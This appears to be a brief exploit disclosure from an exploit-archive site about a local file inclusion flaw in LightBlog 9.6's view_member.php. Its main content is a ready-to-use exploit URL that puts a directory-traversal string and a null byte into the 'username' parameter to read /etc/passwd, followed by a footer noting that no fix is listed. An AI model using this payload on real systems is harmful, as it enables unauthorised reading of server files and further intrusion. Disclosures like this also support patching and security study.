LightBlog 9.6 (username) Local File Inclusion Vulnerability

2008-02-18 00:00:00

lightblog 9.6 local file inclusion vulnerability

download http://www.publicwarehouse.co.uk/php_scripts/lightblog.php

author muuratsalo
contact muuratsalo[at]gmail.com

exploit
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.